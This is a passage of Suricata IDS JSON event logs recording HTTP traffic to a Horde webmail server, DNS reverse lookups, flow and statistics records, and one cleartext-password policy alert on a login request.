Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474870+0000","flow_id":1179362285679512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52900,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:19:42.474831+0000","flow_id":708895863071501,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52906,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} {"timestamp":"2020-02-29T00:19:42.622221+0000","flow_id":2243994484072541,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52904,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:19:45.000188+0000","event_type":"stats","stats":{"uptime":14837,"capture":{"kernel_packets":136862,"kernel_drops":0},"decoder":{"pkts":136870,"bytes":93972713,"invalid":192,"ipv4":135331,"ipv6":10,"ethernet":136870,"raw":0,"null":0,"sll":0,"tcp":129876,"udp":5248,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2821,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2837,"synack":2828,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1858,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2403,"failed_udp":112},"tx":{"http":4740,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2483}},"flow_mgr":{"closed_pruned":2800,"new_pruned":17,"est_pruned":2460,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19182,"memcap_state":0,"memcap_global":0},"http":{"memuse":35946,"memcap":0}}} {"timestamp":"2020-02-29T00:19:45.001812+0000","flow_id":1926025151001775,"event_type":"flow","src_ip":"192.168.10.122","src_port":47129,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:14:44.210095+0000","end":"2020-02-29T00:14:44.318670+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:46.460465+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48104,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.569640+0000","flow_id":206771237029553,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39566,"proto":"UDP","dns":{"type":"answer","id":48104,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.684313+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48171,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.795379+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48171,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.801513+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48172,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:46.811702+0000","flow_id":969742112447211,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34886,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7421}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:46.910017+0000","flow_id":2245338809397529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51086,"proto":"UDP","dns":{"type":"answer","id":48172,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:19:46.915013+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:19:46.942085+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39714,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:47.000564+0000","flow_id":345417056692646,"event_type":"flow","src_ip":"192.168.10.122","src_port":41179,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:14:46.043430+0000","end":"2020-02-29T00:14:46.152344+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.198540+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39715,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.847877+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310}} {"timestamp":"2020-02-29T00:19:47.864664+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":49065,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.868234+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:19:47.870387+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:19:47.871903+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.873169+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:19:47.875349+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.875779+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.901833+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:19:47.901898+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:19:47.903351+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.904158+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:19:47.904960+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:19:47.905891+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.906159+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:19:47.907508+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.907715+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:19:47.907813+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:19:47.910822+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:19:47.911656+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.914177+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.914713+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:19:47.914589+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.921254+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:19:47.923471+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":4}} 